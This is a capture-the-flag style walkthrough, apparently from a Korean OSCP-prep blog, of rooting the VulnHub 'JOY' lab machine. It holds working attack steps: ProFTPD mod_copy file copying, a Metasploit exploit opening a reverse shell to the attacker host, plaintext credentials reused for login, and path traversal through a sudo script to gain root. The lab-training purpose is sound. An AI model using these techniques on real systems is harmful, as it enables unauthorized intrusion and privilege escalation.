https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
1. Enumeration
1-1) Scanning
[root@takudaddy ~/joy]# nmap -A -sV -O -p- 192.168.10.12
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-20 14:39 KST
Nmap scan report for 192.168.10.12
Host is up (0.00050s latency).
Not shown: 65524 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
|_drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0)
25/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
110/tcp open pop3?
139/tcp open tcpwrapped
143/tcp open imap Dovecot imapd
445/tcp open tcpwrapped
465/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imaps?
995/tcp open ssl/pop3s?
MAC Address: 08:00:27:DD:DF:95 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: The, JOY.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms 192.168.10.12
: ftp anonymous login 가능
1-2) Ftp enumeration
^C[root@takudaddy /script]# ftp 192.168.10.12
Connected to 192.168.10.12.
220 The Good Tech Inc. FTP Server
Name (192.168.10.12:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
226 Transfer complete
ftp> cd upload
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x 1 ftp ftp 2110 Mar 20 05:48 directory
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo
-rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado
-rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo
-rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano
-rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho
-rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko
-rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto
-rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno
-rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo
-rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo
-rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder
226 Transfer complete
ftp> lcd /root/joy
Local directory now /root/joy
ftp> get directory
local: directory remote: directory
200 PORT command successful
150 Opening BINARY mode data connection for directory (2312 bytes)
226 Transfer complete
2312 bytes received in 0.00 secs (20.4157 MB/s)
ftp> get reminder
local: reminder remote: reminder
200 PORT command successful
150 Opening BINARY mode data connection for reminder (24 bytes)
226 Transfer complete
24 bytes received in 0.00 secs (25.6990 kB/s)
ftp> exit
221 Goodbye.
1-3) check files
[root@takudaddy ~/joy]# cat directory
Patrick's Directory
total 116
drwxr-xr-x 18 patrick patrick 4096 Mar 20 13:50 .
drwxr-xr-x 4 root root 4096 Jan 6 2019 ..
-rw-r--r-- 1 patrick patrick 0 Mar 20 13:40 2A9KDYHqXClvUOqbXw5kUCrkrPeBWaqO.txt
-rw-r--r-- 1 patrick patrick 0 Mar 20 2021 9qi3ivRqwDQbdBEFSN5D1UOgblgvNZYl.txt
-rw------- 1 patrick patrick 364 Mar 20 13:49 .bash_history
-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc
drwx------ 9 patrick patrick 4096 Mar 20 13:37 .cache
drwx------ 10 patrick patrick 4096 Dec 26 2018 .config
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents
drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads
-rw-r--r-- 1 patrick patrick 0 Mar 20 13:45 EBmOLqTgMs1OewLN8AxrywpA0sRh8dRZ.txt
-rw-r--r-- 1 patrick patrick 24 Mar 20 13:45 fqaaAT1OvZYUnvd6tYUtDxxjVTvKhR5dqGACavC736ewvG4kcoDVsBdydIteINVW.txt
drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg
-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha
-rw------- 1 patrick patrick 9144 Mar 20 13:50 .ICEauthority
drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local
drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music
drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures
-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public
-rw-r--r-- 1 patrick patrick 24 Mar 20 13:40 S8FjgSR8P51zccvgogWaz4f9hEuflenxpseMHBrn2UkI1xvDKDAXoGkRK6xxTZdL.txt
d--------- 2 root root 4096 Jan 9 2019 script
drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos
-rw-r--r-- 1 patrick patrick 24 Mar 20 2021 WBUC3WSOiIgzUkcPqjV02Ho1Jjf1wx2V7LSJlGciCYNGWIwyHU3fOqdWmu1iUJhr.txt
You should know where the directory can be accessed.
Information of this Machine!
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
1-4) copy and upload files
[root@takudaddy ~/joy]# telnet 192.168.10.12 21
Trying 192.168.10.12...
Connected to 192.168.10.12.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/patrick/version_control
350 File or directory exists, ready for destination name
site cpto /home/ftp/upload/version_control
250 Copy successful
quit
221 Goodbye.
Connection closed by foreign host.
[root@takudaddy ~/joy]# ftp 192.168.10.12
Connected to 192.168.10.12.
220 The Good Tech Inc. FTP Server
Name (192.168.10.12:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Mar 20 05:59 upload
226 Transfer complete
ftp> cd upload
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x 1 ftp ftp 2514 Mar 20 06:00 directory
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo
-rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado
-rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo
-rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano
-rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho
-rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko
-rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto
-rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno
-rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo
-rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo
-rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder
-rw-r--r-- 1 0 0 407 Mar 20 05:59 version_control
226 Transfer complete
ftp> lcd /root/joy
Local directory now /root/joy
ftp> get version_control
local: version_control remote: version_control
200 PORT command successful
150 Opening BINARY mode data connection for version_control (407 bytes)
226 Transfer complete
407 bytes received in 0.00 secs (2.9405 MB/s)
ftp> byt
?Invalid command
ftp> byr
?Invalid command
ftp> bye
221 Goodbye.
[root@takudaddy ~/joy]#
[root@takudaddy ~/joy]# ls
directory reminder version_control
[root@takudaddy ~/joy]# cat version_control
Version Control of External-Facing Services:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12
We should switch to OpenSSH and upgrade ProFTPd.
Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
[root@takudaddy ~/joy]#
2. Exploit
2-1) proftpd
[root@takudaddy ~/joy]# msfconsole -q
msf6 > search proftpd 1.3.4
[-] No results from search
msf6 > search proftpd 1.3
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
4 exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/unix/ftp/proftpd_modcopy_exec
msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
6 cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
7 cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
8 cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show options
Module options (exploit/unix/ftp/proftpd_modcopy_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes HTTP port (TCP)
RPORT_FTP 21 yes FTP port
SITEPATH /var/www yes Absolute writable website path
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path to the website
TMPPATH /tmp yes Absolute writable path
VHOST no HTTP server virtual host
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set RHOSTS 192.168.10.12
RHOSTS => 192.168.10.12
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/tryingharderisjoy
SITEPATH => /var/www/tryingharderisjoy
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set LHOST 192.168.10.4
LHOST => 192.168.10.4
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run
[*] Started reverse TCP handler on 192.168.10.4:4444
[*] 192.168.10.12:80 - 192.168.10.12:21 - Connected to FTP server
[*] 192.168.10.12:80 - 192.168.10.12:21 - Sending copy commands to FTP server
[*] 192.168.10.12:80 - Executing PHP payload /mtQ3i.php
[*] Command shell session 1 opened (192.168.10.4:4444 -> 192.168.10.12:43386) at 2021-03-20 15:09:33 +0900
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec)
2-2) Digging
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@JOY:/var/www/tryingharderisjoy$
www-data@JOY:/var/www/tryingharderisjoy$ ls
ls
MxXVZ.php YkX2FF.php mtQ3i.php ossec x8jCPN.php
www-data@JOY:/var/www/tryingharderisjoy$ ls -al
ls -al
total 28
drwxr-xr-x 3 www-data www-data 4096 Mar 20 14:10 .
drwxr-xr-x 4 root root 4096 Mar 20 13:39 ..
-rw-r--r-- 1 root root 79 Mar 20 14:10 MxXVZ.php
-rw-r--r-- 1 root root 80 Mar 20 14:09 YkX2FF.php
-rw-r--r-- 1 root root 78 Mar 20 14:09 mtQ3i.php
drwxr-xr-x 8 www-data www-data 4096 Jan 6 2019 ossec
-rw-r--r-- 1 root root 78 Mar 20 14:10 x8jCPN.php
www-data@JOY:/var/www/tryingharderisjoy$ cd ossec
cd ossec
www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls -al
ls -al
total 116
drwxr-xr-x 8 www-data www-data 4096 Jan 6 2019 .
drwxr-xr-x 3 www-data www-data 4096 Mar 20 14:10 ..
-rw-r--r-- 1 www-data www-data 92 Jul 19 2016 .hgtags
-rw-r--r-- 1 www-data www-data 262 Dec 28 2018 .htaccess
-rw-r--r-- 1 www-data www-data 44 Dec 28 2018 .htpasswd
-rwxr-xr-x 1 www-data www-data 317 Jul 19 2016 CONTRIB
-rw-r--r-- 1 www-data www-data 35745 Jul 19 2016 LICENSE
-rw-r--r-- 1 www-data www-data 2106 Jul 19 2016 README
-rw-r--r-- 1 www-data www-data 923 Jul 19 2016 README.search
drwxr-xr-x 3 www-data www-data 4096 Jul 19 2016 css
-rw-r--r-- 1 www-data www-data 218 Jul 19 2016 htaccess_def.txt
drwxr-xr-x 2 www-data www-data 4096 Jul 19 2016 img
-rwxr-xr-x 1 www-data www-data 5177 Jul 19 2016 index.php
drwxr-xr-x 2 www-data www-data 4096 Jul 19 2016 js
drwxr-xr-x 3 www-data www-data 4096 Dec 28 2018 lib
-rw-r--r-- 1 www-data www-data 462 Jul 19 2016 ossec_conf.php
-rw-r--r-- 1 www-data www-data 134 Jan 6 2019 patricksecretsofjoy
-rwxr-xr-x 1 www-data www-data 2471 Jul 19 2016 setup.sh
drwxr-xr-x 2 www-data www-data 4096 Dec 28 2018 site
drwxrwxrwx 2 www-data www-data 4096 Dec 28 2018 tmp
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cd ^Hpatick.ku
cdpatick.ku
bash: cdpatick.ku: command not found
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecreteso
cat patricksecreteso
cat: patricksecreteso: No such file or directory
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
how would these hack3rs ever find such a page?
3. Privilege Escalation
3-1) Login as Patrick
www-data@JOY:/var/www/tryingharderisjoy$ su patrick
su patrick
Password: apollo098765
patrick@JOY:/var/www/tryingharderisjoy$ sudo -l
sudo -l
Matching Defaults entries for patrick on JOY:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User patrick may run the following commands on JOY:
(ALL) NOPASSWD: /home/patrick/script/test
patrick@JOY:/var/www/tryingharderisjoy$ sudo /home/patrick/script/test
sudo /home/patrick/script/test
I am practising how to do simple bash scripting!
What file would you like to change permissions within this directory?
/etc/passwd
/etc/passwd
What permissions would you like to set the file to?
777
777
Currently changing file permissions, please wait.
chmod: cannot access '/home/patrick/script//etc/passwd': No such file or directory
Tidying up...
Done!
patrick@JOY:/var/www/tryingharderisjoy$ sudo /home/patrick/script/test
sudo /home/patrick/script/test
I am practising how to do simple bash scripting!
What file would you like to change permissions within this directory?
../../../etc/passwd
../../../etc/passwd
What permissions would you like to set the file to?
777
777
Currently changing file permissions, please wait.
Tidying up...
Done!
patrick@JOY:~$ ls -al /etc/passwd
ls -al /etc/passwd
-rwxrwxrwx 1 root root 2556 Mar 20 14:45 /etc/passwd
3-2) Create shell code and upload via ftp
로컬에서 동일한 이름의 쉘 파일을 하나 생성
# echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test
이 test 파일을 ftp로 업로드하고
telnet으로 해당 파일을
/home/patrick/script/test 로 변경해주면 끝
telnet 명령어 >
site cpfr /home/ftp/test
site cpto /home/patrick/script/test
[root@takudaddy ~/joy]# cat test
awk 'BEGIN {system("/bin/bash")}'
[root@takudaddy ~/joy]#
[root@takudaddy ~/joy]# ftp 192.168.10.13 21
Connected to 192.168.10.13.
220 The Good Tech Inc. FTP Server
Name (192.168.10.13:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> lcd /root/joy
Local directory now /root/joy
ftp> put test
local: test remote: test
200 PORT command successful
150 Opening BINARY mode data connection for test
226 Transfer complete
34 bytes sent in 0.00 secs (2.3161 MB/s)
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
-rw-r--r-- 1 ftp ftp 34 Mar 20 07:03 test
drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
226 Transfer complete
[root@takudaddy ~/joy]# telnet 192.168.10.13 21
Trying 192.168.10.13...
Connected to 192.168.10.13.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/test
350 File or directory exists, ready for destination name
site cpto /home/patrick/script/test
250 Copy successful
3-3) 다 됐다.
이제 침투 서버에서 프로그램을 실행해주자
patrick@JOY:/var/www/tryingharderisjoy$ sudo /home/patrick/script/test
sudo /home/patrick/script/test
root@JOY:/var/www/tryingharderisjoy# cd /root
cd /root
root@JOY:~# ls
ls
author-secret.txt dovecot.crt dovecot.key proof.txt rootCA.pem
document-generator.sh dovecot.csr permissions.sh rootCA.key rootCA.srl
root@JOY:~# cat author-secret.txt
cat author-secret.txt
Thanks for joining us!
If you have not rooted MERCY, DEVELOPMENT, BRAVERY, TORMENT, please root them too!
This will conclude the series of five boxes on Vulnhub for pentesting practice, and once again, these were built while thinking about OffSec in mind. :-)
For those who have helped made videos on rooting these boxes, I am more than grateful for your support. This means a lot for the box creator and those who have helped test these boxes. A shoutout to the kind folk from Wizard Labs, Zajt, as well as friends in the local security community which I belong to.
If you found the boxes a good learning experience, feel free to share them with your friends.
As of the time of writing, I will be working on (building) some boxes on Wizard-Labs, in a similar flavour to these boxes. If you enjoyed these, consider pinging them and their project. I think their lab is slowly being built into a nice lab with a variety of machines with good learning value.
I was rather glad someone found me on Linkedin after breaking into these boxes. If you would like to contact the author, you can find some of the author's contact points on his website (https://donavan.sg).
May the r00t be with you.
P.S. Someone asked me, also, about "shesmileslikeabrightsmiley". Yes, indeed, she smiles like a bright smiley. She makes me smile like a bright smiley too? :-)
끝
728x90
'OSCP > Vulnahub' 카테고리의 다른 글
| 5. Digitalwolrd.local : bravery (0) | 2021.03.25 |
|---|---|
| 4. Digitalworld.local : Develope (0) | 2021.03.23 |
| 2. DIGITALWORLD.LOCAL: Mercy V2 (0) | 2021.03.19 |
| 1. DC: 9 (0) | 2021.03.17 |
| 현 OSCP 코스 시스템과 비슷한 박스 시작 (0) | 2021.03.16 |